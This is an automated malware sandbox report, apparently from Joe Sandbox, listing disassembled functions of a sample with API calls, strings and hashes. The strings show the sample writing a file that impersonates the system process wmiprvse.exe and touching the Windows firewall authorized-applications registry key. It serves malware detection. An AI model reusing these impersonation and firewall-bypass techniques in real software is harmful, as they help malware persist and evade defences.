Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: FileMove$AddressLibraryLoadPathProcTemplstrcat
String ID: A$F$G$M$N$SOFTWARE.LOG$a$d$i$kernel32.dll$m$o$t$u
API String ID: 20907805-1765106238
Opcode ID: 7fd43944f68fb6c432481ebaa13493a170158cfa409d862e8056095c2823890d
Instruction ID: 27376e1d226d6c03194d421c0e1a1af7b37e71632551d2efb61b8b65d87483f2
Opcode Fuzzy Hash: 7fd43944f68fb6c432481ebaa13493a170158cfa409d862e8056095c2823890d
Instruction Fuzzy Hash: EE216F7114C3C2DEE312CB68C908B9BBFD45BAA704F08495DB2C456282D6B9961CC7B7

Function 7FE32FCB Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 309filelibraryloaderCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
"', xrefs: 7FE33114
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330D3, 7FE330EE
ADVAPI32.DLL, xrefs: 7FE3313A

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 896256579-4128452508
Opcode ID: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction ID: 9c4dac55b76228d7ff9437610bb880f50dd66be18c7f3b043a5811b11c928d4e
Opcode Fuzzy Hash: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction Fuzzy Hash: E6A1F571954718BFEB269F208C0EFEA37ADDF41311F80011AED5A9E081DAF46F05D6A5

Function 009B2FCB Relevance: 33.6, APIs: 13, Strings: 6, Instructions: 309filelibraryloaderCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 009B30D4
WriteFile.KERNEL32(00000000,009B3EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 009B30F6
CloseHandle.KERNEL32(?,00000003), ref: 009B30FC
GetProcAddress.KERNEL32(00000000,009B311D), ref: 009B3128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 009B313B
GetTickCount.KERNEL32 ref: 009B316F

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 009B30D3, 009B30EE
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B330F
hell32.dll,-1, xrefs: 009B328E, 009B330E
ADVAPI32.DLL, xrefs: 009B313A
"', xrefs: 009B3114
"', xrefs: 009B32BA

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 896256579-4128452508
Opcode ID: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction ID: 690cf75c5f46dbfad55174143bc5f1269540c7285914231332d006009ae9d403
Opcode Fuzzy Hash: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction Fuzzy Hash: C6A10671554608BFEB26EF24CD0ABEA3BACEF41321F40451AFD199E081DBF45F0686A5

Function 0047FD84 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 292filelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(0047FD79), ref: 0047FD84
GetSystemDirectoryA.KERNEL32(00482C2E,00000104), ref: 0047FD9B
CreateFileA.KERNEL32(00482C2E,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0047FDDC
WriteFile.KERNEL32(00000000,00480BE3,00000019,00482C2E,00000000,00000000), ref: 0047FDFE
CloseHandle.KERNEL32(?,00000003), ref: 0047FE04
GetProcAddress.KERNEL32(00000000,0047FE25), ref: 0047FE30
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 0047FE43
GetTickCount.KERNEL32 ref: 0047FE77
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00483082,00000000,00000000,00000000,00000000), ref: 0047FF49

Strings

"', xrefs: 0047FE1C
"', xrefs: 0047FFC2
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00480017
ADVAPI32.DLL, xrefs: 0047FE42

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: FileHandle$AddressCloseCountCreateDirectoryInformationLibraryLoadModuleProcSystemTickVolumeWrite
String ID: "'$"'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 1729360627-3465829191
Opcode ID: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction ID: 7bd5bf45457efd2896b910d0e7970ae087a12d2d42fd200cd0f69a5a9196fda1
Opcode Fuzzy Hash: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction Fuzzy Hash: 4491FB71554248BFEB35AF21CC0ABEE375CDF01715F00412BFD599A092D6F85F0A86A9

Function 0047FDB3 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 273stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00482C2E,0047FDA6), ref: 0047FDB4

Part of subcall function 0047FDC6: lstrcatA.KERNEL32(00482C2E,0047FDBF), ref: 0047FDC7
Part of subcall function 0047FDC6: CreateFileA.KERNEL32(00482C2E,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0047FDDC
Part of subcall function 0047FDC6: WriteFile.KERNEL32(00000000,00480BE3,00000019,00482C2E,00000000,00000000), ref: 0047FDFE
Part of subcall function 0047FDC6: CloseHandle.KERNEL32(?,00000003), ref: 0047FE04
Part of subcall function 0047FDC6: GetProcAddress.KERNEL32(00000000,0047FE25), ref: 0047FE30
Part of subcall function 0047FDC6: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 0047FE43
Part of subcall function 0047FDC6: GetTickCount.KERNEL32 ref: 0047FE77

Strings

"', xrefs: 0047FE1C
"', xrefs: 0047FFC2
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00480017
ADVAPI32.DLL, xrefs: 0047FE42

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Filelstrcat$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 4135777234-3465829191
Opcode ID: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction ID: 0c758667335218c90f85d575aa06eed63a3ca8922f38a5acd67208de2acf439b
Opcode Fuzzy Hash: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction Fuzzy Hash: CB91E671514708BFEB36AF219C0ABEE376CDF01701F00452BFD199A092DAF85F4986A9

Function 0047FDC6 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 264filelibrarystringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00482C2E,0047FDBF), ref: 0047FDC7
CreateFileA.KERNEL32(00482C2E,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0047FDDC
WriteFile.KERNEL32(00000000,00480BE3,00000019,00482C2E,00000000,00000000), ref: 0047FDFE
CloseHandle.KERNEL32(?,00000003), ref: 0047FE04
GetProcAddress.KERNEL32(00000000,0047FE25), ref: 0047FE30
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 0047FE43
GetTickCount.KERNEL32 ref: 0047FE77
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00483082,00000000,00000000,00000000,00000000), ref: 0047FF49

Strings

"', xrefs: 0047FE1C
"', xrefs: 0047FFC2
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00480017
ADVAPI32.DLL, xrefs: 0047FE42

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleInformationLibraryLoadProcTickVolumeWritelstrcat
String ID: "'$"'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3969241177-3465829191
Opcode ID: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction ID: c8aaa11ad6ec9eae92136448849b97a30557e4e2a489ef321387a0b65ff8bddc
Opcode Fuzzy Hash: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction Fuzzy Hash: 8581C571514608BFEB26AF65DC0ABEE376CDF01701F00452BFD199A091EAF85F0986A9

Function 0047FCD3 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 309filelibraryloaderCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00482C2E,40000000,00000000,00000000,00000003,00000000,00000000), ref: 0047FDDC
WriteFile.KERNEL32(00000000,00480BE3,00000019,00482C2E,00000000,00000000), ref: 0047FDFE
CloseHandle.KERNEL32(?,00000003), ref: 0047FE04
GetProcAddress.KERNEL32(00000000,0047FE25), ref: 0047FE30
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 0047FE43
GetTickCount.KERNEL32 ref: 0047FE77

Strings

"', xrefs: 0047FE1C
"', xrefs: 0047FFC2
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00480017
ADVAPI32.DLL, xrefs: 0047FE42

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

